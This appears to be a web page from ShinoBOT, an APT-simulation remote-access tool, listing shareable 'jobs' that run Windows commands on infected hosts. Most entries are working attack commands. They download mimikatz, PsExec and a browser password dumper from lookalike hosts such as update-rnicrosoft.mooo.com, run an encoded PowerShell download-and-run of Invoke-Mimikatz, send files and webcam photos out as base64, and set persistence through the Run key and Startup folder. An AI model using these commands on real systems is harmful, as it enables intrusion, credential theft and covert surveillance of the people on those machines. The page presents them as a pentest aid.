ShinoBOTCan you detect an APT like me ?
JOB REPOSITORY
WHAT IS JOB?
Job is a command set that you can share with everybody.
If you know a nice hacking command, you can create a new job.
And this will help other people to accomplish their pentesting.
CREATE A NEW JOB
CATEGORY
DESCRIPTION
OUTPUT TYPE * if you don't know which type you should select, try "text".
JOB LIST
ID NAME
CATEGORY COMMAND
CREATED DESCRIPTION
14Download a file
Add Weaponpowershell (new-object System.Net.WebClient).DownloadFile('%PARAMETER1%' , '%TEMP%\temp.dat');
2015-03-23 13:27:29(9y 29w)Download a file from the specified URL.
PARAMETER (Must) -- URL
e.g.)http://shinosec.com/
35Download PsExec
Add Weaponpowershell (new-object System.Net.WebClient).DownloadFile('http://update-rnicrosoft.mooo.com/files/85df66b931cfbfb0_PsExec.exe','%TEMP%\pse.exe');
dir %TEMP%\pse.exe
2016-08-07 20:53:09(8y 9w)Download PsExec (v2.11)
https://technet.microsoft.com/en-us/sysinternals/psexec.aspx

NO PARAMETER
13Upload a file
Data Exfiltrationpowershell [convert]::ToBase64String((Get-Content %PARAMETER1% -Encoding byte))
2015-03-23 12:45:06(9y 29w)Upload a client file to this server.
PARAMETER (Must) --- File Path

e.g.) C:\Users\Administrator\Desktop\secret.doc
20Get Domain Admins Name
Internal Reconnet group "Domain Admins" /domain
2015-04-03 11:38:57(9y 27w)Get the domain administrator (member of Domain Admins group).

NO PARAMETER
21Get Local Administrators Name
Internal Reconnet localgroup "Administrators"
2015-04-03 11:41:45(9y 27w)Get the local administrators account name.
23Get the Neighbour IP Address
Internal Reconarp -a
2015-04-04 15:18:31(9y 27w)Get the neighbour PC's IP Address using the ARP table.

NO PARAMETER
26Get the Windows Password with Mimikatz
Internal Reconpowershell (new-object System.Net.WebClient).DownloadFile('http://shinomal.mooo.com/files/6fdc6cf5e9c53aa2_mimikatz.exe' , '%TEMP%\mimikatz.exe');
%temp%\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit | findstr Password
2015-04-04 15:31:03(9y 27w)Download mimikatz (http://blog.gentilkiwi.com/mimikatz) and execute it.

NO PARAMETER

Administrator Rights required.
34Steal Browser Password with bpd.exe
Internal Reconpowershell (new-object System.Net.WebClient).DownloadFile('http://update-rnicrosoft.mooo.com/files/994b8d282016bc21_BrowserPasswordDump.exe' , '%TEMP%\bpd.exe');
%TEMP%\bpd.exe
2016-08-07 20:32:22(8y 9w)Steal the password stored by browser.

NO PARAMETER
36CAPSLOCK Dance
Jokeecho Set wshShell =wscript.CreateObject("WScript.Shell") > capslock.vbs
echo do >> capslock.vbs
echo wscript.sleep 1000 >> capslock.vbs
echo wshshell.sendkeys "{CAPSLOCK}" >> capslock.vbs
echo loop >> capslock.vbs
wscript capslock.vbs
2016-08-11 02:14:28(8y 9w)Toggle the Capslock key repeatedly.

Kill the process wscript.exe to stop this nightmare.
Command example)
taskkill /F /IM wscript.exe

NO PARAMETER
37Speech
Jokeecho Dim message, sapi > speech.vbs
echo message="%PARAMETER1%" >> speech.vbs
echo Set sapi=CreateObject("sapi.spvoice") >> speech.vbs
echo sapi.Speak message >> speech.vbs
wscript speech.vbs
2016-08-11 03:11:19(8y 9w)Speech the specified text.

PARAMETER (Mandantory)
The text you want to speech.
38Open CD tray
Jokeecho Set oWMP = CreateObject("WMPlayer.OCX.7" ) > cdtray.vbs
echo Set colCDROMs = oWMP.cdromCollection >> cdtray.vbs
echo if colCDROMs.Count >= 1 then >> cdtray.vbs
echo do >> cdtray.vbs
echo For i = 0 to colCDROMs.Count - 1 >> cdtray.vbs
echo colCDROMs.Item(i).Eject >> cdtray.vbs
echo Next ' cdrom >> cdtray.vbs
echo For i = 0 to colCDROMs.Count - 1 >> cdtray.vbs
echo colCDROMs.Item(i).Eject >> cdtray.vbs
echo Next ' cdrom >> cdtray.vbs
echo loop >> cdtray.vbs
echo End If >> cdtray.vbs

wscript cdtray.vbs
2016-08-11 07:45:58(8y 9w)Open the CD tray repeatedly.

Kill the process wscript.exe to stop this nightmare.
Command example)
taskkill /F /IM wscript.exe

NO PARAMETER
15Free Command
Misc
2015-03-23 14:42:46(9y 29w)There is no command, so you can use the parameter as the command without having this in the job repository.

PARAMETER (Must) --- Command
e.g) ipconfig .all
18Capture Web Cam
Miscpowershell (new-object System.Net.WebClient).DownloadFile('http://shinomal.mooo.com/files/3ebf375ce9a33d41_CommandCam.exe' , '%TEMP%\CommandCam.exe');
%TEMP%\CommandCam.exe /filename %temp%\image.bmp /quiet /delay %PARAMETER1%1
powershell [convert]::ToBase64String((Get-Content %TEMP%\image.bmp -Encoding byte))
2015-04-03 08:51:49(9y 27w)Download CommandCam: https://batchloaf.wordpress.com/commandcam/
Execute it to take a picture.
Then upload the picture.

PARAMETER (Option) -- Delay before taking the photo in centisec.
e.g.) 1000
It means 10 seconds.
22Auto Start Using Startup Folder
Persistencecopy %PARAMETER1% %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
2015-04-03 16:04:55(9y 27w)Download the newest ShinoBOT to the startup folder.

PARAMETER (Must) -- File name
e.g.)ShinoBOT.exe
43Auto Start With Run registry
Persistencereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v ShinoBOT /d %PARAMETER1%
2016-10-25 08:10:14(7y 50w)Add a registry key to start ShinoBOT after OS reboot.
You have to specify the path of ShinOBOT. If you don't know, use "cd" command to check the current directory.

PARAMETER(Must) -- ShinoBOT Path (absolute)
e.g.)C:\User\username\ShinoBOT.exe
41Run As Administrator
Privilege Escalationpowershell Start-Process %PARAMETER1% -Verb RunAs
2016-09-14 05:16:52(8y 4w)Same as "Run As Administrator". If UAC is enabled, a popup will appear.

PARAMETER(Must) -- Executable path
e.g.)%TEMP%\ShinoBOT.exe
1Get Hostname (Default)
System Informationhostname
2015-03-20 09:48:18(9y 29w)Get host name.
2Get User Name / Domain Name (Default)
System Informationwhoami
2015-03-20 09:53:36(9y 29w)Get the user name.

PARAMETER (Optional) --- parameter of whoami command

e.g)
/ALL for details
/LOGINID for SID
/PRIV to enum the user priviledge
3Get local IP Address (Default)
System Informationipconfig
2015-03-20 09:56:36(9y 29w)Get the local IP Address from ipconfig.
NO PARAMETER
4Get Current Directory (Default)
System Informationcd
2015-03-20 09:59:18(9y 29w)Get current directory.

NO PARAMETER
10Screenshot (Default)
System InformationSBOTshot
powershell [convert]::ToBase64String((Get-Content %TEMP%\SBOTshot -Encoding byte))
2015-03-23 08:49:56(9y 29w)Take a screen shot. NO PARAMETER.
12Get Windows Version (Default)
System Informationver
2015-03-23 09:35:31(9y 29w)Get the Windows version using command ver.
16Get System Info Details (Default)
System Informationsysteminfo
2015-03-24 01:54:52(9y 29w)Get the hardware detail, NIC information, hotfix applied.

NO PARAMETER
19Get Time Zone
System Informationtzutil /g
2015-04-03 11:35:40(9y 27w)Get Time Zone by tzutil command.

NO PARAMETER
24Get the File List
System Informationdir /a:-d /b
2015-04-04 15:21:10(9y 27w)Get the file list (not directory).

PARAMETER -- Folder Path
e.g.)C:\Users

If no parameter is specified, the current directory will be used.
25Get the Folder List
System Informationdir /a:d /b
2015-04-04 15:22:35(9y 27w)Get the folder list (not file).

PARAMETER -- Folder Path
e.g.)C:\Users

If no parameter is specified, the current directory will be used.
33Get Proxy Settings
System Informationreg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer
2015-04-24 05:25:55(9y 24w)NO PARAMETER
39Invoke Mimikatz
System Informationpowershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AUwBoADEAbgAwAGcAMQAvAFAAbwBzAHQALQBDAG8AbQBwAHIAbwBtAGkAcwBlAGQALQBUAG8AbwBsAHMALwBtAGEAcwB0AGUAcgAvAGkAbQAuAHAAcwAxACcAKQA7ACAAJABvAHUAdABwAHUAdAA9AEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBEAHUAbQBwAEMAcgBlAGQAcwA7ACAAVwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAkAG8AdQB0AHAAdQB0AA==
2016-09-12 14:50:50(8y 4w)Get Windows passwords by Mimikatz injected into memory; no file access.

NO PARAMETER

*Administration Rights required.
40Ask Admin Rights by UAC
System Informationpowershell Start-Process %PARAMETER1% -Verb runAs
2016-09-12 14:55:15(8y 4w)Get the Administration Right by UAC.


PARAMETER(Must) -- File Path
e.g.)C:\temp\ShinoBOT.exe
44Check Login User
System Informationquery user
2016-10-25 08:34:22(7y 50w)Check the existing user session, login time.

NO PARAMETER